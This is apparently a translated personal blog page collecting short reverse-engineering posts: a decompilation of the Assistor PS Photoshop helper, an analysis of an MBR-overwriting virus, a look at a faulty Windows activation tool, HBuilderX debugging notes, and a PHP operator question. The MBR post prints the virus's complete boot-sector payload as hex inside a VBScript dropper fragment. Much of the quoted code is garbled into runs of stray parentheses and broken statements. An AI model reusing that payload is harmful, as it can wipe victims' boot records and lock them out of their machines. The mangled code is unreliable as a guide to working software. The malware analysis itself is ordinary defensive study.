Web , Analysis

Assistor PS analysis

 WeChat screenshot _20190806163246.png

Assistor PS:Save Your Valuable Time (save your precious time)

First look Assistor PS makes me feel amazing. It doesn't need to exist in the form of plug-ins, it can read layers, and annotate, cut, distance calculation and so on a series of black technology functions for each layer. So Anne couldn't help analyzing it.

 WeChat screenshot _20190806163744.png

The interface is very beautiful, and then there are a few buttons, originally wanted to directly find the button under the event, found not too easy to find, so changed a train of thought, find the hotkey corresponding events.

Decompile the following code

 GlobalHotKey.Register (hwndSource.Handle, ModifierKeys.Alt, GlobalHotKey.Keys.D1).Pressed = OnHotKeyPressed; 
GlobalHotKey.Register (hwndSource.Handle, ModifierKeys.Alt, GlobalHotKey.Keys.D2) = =.Pressed; = (f);

Then find the callback event.

 Switch (e.Key) 
case GlobalHotKey.Keys.D1:
Tool.ExecutePosition (); 
case GlobalHotKey.Keys.D2:
Tool.ExecuteSize (;); 
case GlobalHotKey.Keys.D3:
Tool.ExecuteDistance (); 
break;; (E);; (E); "("); ";"; "("); "("); "

It is found that the author encapsulates some operations to view the Tool class.

 Public void ExecutePosition () 
this.AppendLog (LogType.Information, LogSubType.Execute, AssistorLogType.LayerDescriptor_Position, string.Empty, string.Empty); 
this. (ScriptProvider.Execute (string.Empty, V ())); (2), (1), ((1), (2), (1), ((2), (1), ((), ()); (2), (1, (2), (2), ((), (), ((), ()); (2); ( IstorLogType.LayerDescriptor_GuideBox, string.Empty, string.Empty); 
this. (ScriptProvider.Execute (ScriptMethodType.GuideBox, this. ())); 
public void ExecuteSnips () 
this.AppendLog (ExecuteSnips, x, P, R, d); (((x), ());}

Then there is a ScriptProvider, which contains some relatively good writing processes. In general, you can judge the type of your execution by ScriptMethodType, and then execute the JSX script of Photoshop.

ScriptMethodType type

 Public enum ScriptMethodType

JSX script

  1. JSX.WIT.Photoshop.Application.jsx

  2. JSX.WIT.Photoshop.Common.jsx

  3. JSX.WIT.Photoshop.Document.jsx

  4. JSX.WIT.Photoshop.DrawingContext.jsx

  5. JSX.WIT.Photoshop.JSON.jsx

  6. JSX.WIT.Photoshop.Parameter.jsx

  7. JSX.WIT.Photoshop.Parser.jsx

  8. JSX.WIT.Photoshop.Polygons.jsx

  9. JSX.WIT.Photoshop.Processor.jsx

  10. JSX.WIT.Photoshop.Script.Capture.jsx

  11. JSX.WIT.Photoshop.Script.Distance.jsx

  12. JSX.WIT.Photoshop.Script.Export.jsx

  13. JSX.WIT.Photoshop.Script.GuideBox.jsx

  14. JSX.WIT.Photoshop.Script.Guides.jsx

  15. JSX.WIT.Photoshop.Script.GuidesClear.jsx

  16. JSX.WIT.Photoshop.Script.GuidesHCenter.jsx

  17. JSX.WIT.Photoshop.Script.GuidesVCenter.jsx

  18. JSX.WIT.Photoshop.Script.jsx

  19. JSX.WIT.Photoshop.Script.Position.jsx

  20. JSX.WIT.Photoshop.Script.Rounder.jsx

  21. JSX.WIT.Photoshop.Script.Size.jsx

  22. JSX.WIT.Photoshop.Script.Snips.jsx

  23. JSX.WIT.Photoshop.Script.Text.jsx

  24. JSX.WIT.Photoshop.Script.Tiler.jsx

You can see that the name is consistent with the ScriptMethodType custom type.

Part script source code

 function Photoshop() {
    var desc = new ActionDescriptor();
    var ref = new ActionReference();
    ref.putProperty(typeID("Prpr"), typeID("PbkO"));
    ref.putEnumerated(typeID("capp"), typeID("Ordn"), typeID("Trgt"));
    desc.putReference(typeID("null"), ref );
    var pdesc = new ActionDescriptor();
    pdesc.putEnumerated(typeID("performance"), typeID("performance"), typeID("accelerated"));    
    desc.putObject(typeID("T   "), typeID("PbkO"), pdesc );
    executeAction(typeID("setd"), desc, DialogModes.NO);
Photoshop.prototype.SetPanelVisibility = function(panelName, visible)
    try {
        var desc = new ActionDescriptor();
        var ref = new ActionReference(); 
        ref.putName( stringIDToTypeID( "classPanel" ), panelName ); 
        desc.putReference( charIDToTypeID( "null" ), ref ); 
        executeAction( stringIDToTypeID( visible ? "show" : "hide"), desc, DialogModes.NO );  
Photoshop.prototype.GetActiveDocument = function (()) {
return new Document ({
return, new ());} (} (}); (2) = (()) (=); ("(") ");" ("" ")"; "(" "")); "(" "") ";" ("" ")" ("(")), "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" "")), "(" "")), "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(" ")", "(") "ity = function (visible) 
this.SetPanelVisibility ('panelid.static.layers', visible); Nce.putIdentifier (typeID ("Dcmn"), documentId); 
documentDescriptor.putReference (typeID ("null"), documentReference); 
executeAction (typeID ("SLCT"), 
executeAction);}; {} = (());}; {}; (=); (=); {};};

Analysis of a MBR virus

MBR is the master boot record and can enter the system to count on it. Now, some viruses also aim at it. Just looking at a post, I saw a person saying the virus and gave a sample, so I analyzed it. If there is any mistake, I would like to point out.

After poisoning: the MBR was cleared after the first direct decryption. So the ID displayed is inconsistent with the analysis.

 Screen snapshot 2019-01-15 PM 10.04.59.png

The main program is a VM shell program. After running, there is an interface with a button. After clicking, it will rewrite your MBR, and the MBR code is as follows.

 Screen snapshot 2019-01-15 PM 9.57.39.png

The above is the sixteen binary display format of MBR, which needs to be converted into bytes for analysis. Wrote a script for VBScript to do the transformation.

 WriteData = "E900008CC88ED88ED08EC0BC0001BDED7CBBED7CE8B00089C1B80113BB0C00B200CD10B800B805A0008ED831C931DB31C0CD163C0874133C0D741BB402880788670181C3020041E9E5FF81EB02004931C08907E9D9FF8CC88EC031DBBEDA7C2E8A0ED97CB5003E8A07268A2438E0753181C3020046E2EF31C0B8007E8EC031D BB402B280B001B600B500B103CD1331DBB280B403B001B600B500B101CD13E91D00BB00B881C33800B05888072E8B0ED97C31C0890781C30200E2F8E945FFB8FFFF50B8000050CB51533E8A0F80F90074054340E9F3FF595BC307394439373346670000000000000000000000005151333339363239363734370D0A51513331 31303038333234380D0A0D0A594F5552204944203D2042433033620D0A0D0A42793A58692059616E672059616E670000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 000000000055AA "
Set FSO = CreateObject (" Scripting.FileSystemObject ") 
DropPath = FSO.GetFolder (". ").Path & \1.exe" 
If FSO.FileExists (\1.exe) "=" 1 "," 2 "," FSO "," (","), "("), "(", ")," ("),"

Then we can analyze the 1.exe and drag it into IDA, with very little code, only 512 bytes, which is the fixed size of MBR. You can see the following key code, so as to facilitate the viewing, so the remarks.

Among them, 39H, 44H, 39H, 37H, 33H, 46H, 67H are the passwords. Just turn it into a string.

The problem of activating tools for shallow drinking

A few days ago, when the activation tool activated the system, the prompt was successful, but after restarting the computer, it could not start correctly, and finally reinstalled it. Today, my colleagues told me that after he activated, he would restart indefinitely. So I wanted to study the activation tool, downloading the activation tool that my colleagues said would enable him to reboot indefinitely, and I don't know if the version is correct.

 Screen snapshot 2018-12-21 PM 11.03.00.png

Look at the first PUSHAD command and feel that it is adding a compression shell, so it is OK to use the ESP register to take off the shell, otherwise you can't get the RC data behind. I got stuck on the debug tool for the first time. So they used a previous technology to shelling.

 Screen snapshot 2018-12-21 PM 10.27.17.png

First, choose the size of the correction image, because the size you change into memory will change, so you have to fix it. Then click on the whole shell. A bad thing about this shelling is that its input and output tables may not help you complete the dump. So you have to repair the input and output tables.

 Screen snapshot 2018-12-21 PM 10.26.25.png

Generally encountered strong shell, repair input and output table pointer will be a problem. Because the shell keeps your pointer hidden or drawn away or confused. There are many ways, so there are three levels of pointer repair here. If you can't do that, you can try to delete invalid pointers directly. But this time it's better. It's all valid pointers.

 Screen snapshot 2018-12-21 PM 11.08.16.png

At this time, you are saving and repairing. It will be an operation of push EBP, a 32 bit EBP register, which is also called airspace. The beginning of the airspace represents the beginning of a subroutine, but this is the main thread.

I tried to find the beginning of the function subroutine activated on the interface.

 Screen snapshot 2018-12-21 PM 11.10.47.png

But when I enter one of the call, I will wait for a long time, then I will not support my system. Because my system is XP. There is no way to look at the process directly and statically. Actually you can use IDA to look at it, but it doesn't matter much in the evening. The following process is basically the same:

Testing 360 anti-virus ->KMS service to install ->slmgr->x0

As colleagues mentioned the restart, I also looked at whether the program called the system's restart command. No discovery. It is mentioned here that all the restart system operations will eventually take over the system. ExitWindowsEx Function.

 BOOL ExitWindowsEx (
UINT uFlags, 
DWORD dwReason

Finally, it was discovered that the problem that my system could not enter the system should be that the boot was destroyed because the software was guided to read and write operations, and the guidance of win10 was different from that of win7, and a new guidance method was adopted. So it may be incompatible to cause my computer to fail. I didn't see why my colleagues restarted. If you have time, maybe you will download the version of your colleague for a good analysis. It's just because you haven't updated the article for a long time, and forced to brush it.

HBuilderX test base analysis

 WeChat screenshot _20181031145619.png

Create a new project. The Html code is as follows:

 <! DOCTYPE html>
<meta charset= "UTF-8" >
<meta name= "viewport" content= "width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1," "" "" "" ">"

Because cloud packing still needs to fill in some information, here is the direct simulator debugging.

 WeChat screenshot _20181031144857.png

It's pretty good to see this interface. Click the button also has some effect. But then changed the code. Then directly Ctrl+S. As some output information is over, the interface of simulator is changed. You know, if it is normal development, this upload operation will definitely cover APP, causing APP to close and then boot. But there is no such change. So it feels like a WebView. ADB notifications APP overload.

The following are verified:

First, look at the interface node information of this base:

 WeChat screenshot _20181031145109.png

To expand the tree structure to the last node, you can see that it is a WebView. And the URL it loads can be viewed through output information.

 WeChat screenshot _20181031145134.png

Under the Android directory of the memory card. Expand this directory step by step, and you will find the code you write.

 WeChat screenshot _20181031145209.png

This is some information about HBuilder debugging base, if real APP is also such a structure, such a way of storage. Then there will be a problem.

PHP operations and variable references

A problem was encountered when adding groups.

$c=$b++ + ++$a;

Q: $c=? If you drop ide to do it, it's easy to get 4, but how exactly is it achieved? Let me talk about it here.

First, $b=&$a; Notice that here is the reference in PHP, which is equivalent to taking the memory space airspace address. That is a pointer. So the operation of $b is equivalent to the operation of $a. $b++ + ++$a; here is operator priority. First of all, $b++ is actually $b first participating in computation and then increasing itself. The other ++$a is just the opposite. That is the equivalent of $c=1+3.